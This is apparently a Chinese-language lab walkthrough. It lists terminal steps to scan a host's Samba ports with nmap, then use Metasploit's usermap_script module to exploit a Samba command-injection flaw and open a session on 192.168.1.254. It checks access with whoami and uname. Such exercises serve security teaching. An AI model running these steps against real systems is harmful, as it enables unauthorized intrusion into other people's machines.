一、信息收集
1.1 右键单击桌面,选择 Open Terminal Here ,打开终端。
1.2 输入命令 nmap -sS -p 139,445 -A 192.168.1.254 ,对目标主机进行扫描,发现
139、445 端口开放。
1.3 输入命令“msfconsole”,启动 MSF 终端。
1.4 输入命令“search samba”,搜索 samba 的相关攻击脚本。
1.5 输入命令“use exploit/multi/samba/usermap_script”,启用漏洞利用模块, 提
示符就会提示进入到该路径下。
1.6 输入命令“show options”,查看需要设置的相关项,yes 表示必须填写的参数。
1.7 输入命令“set rhost 192.168.1.254”,设置目标主机的 IP 地址。
1.8 输入命令“run”, 向目标主机攻击,建立会话。
1.9 输入命令 whoami、uname -a ,查看目标系统相关信息。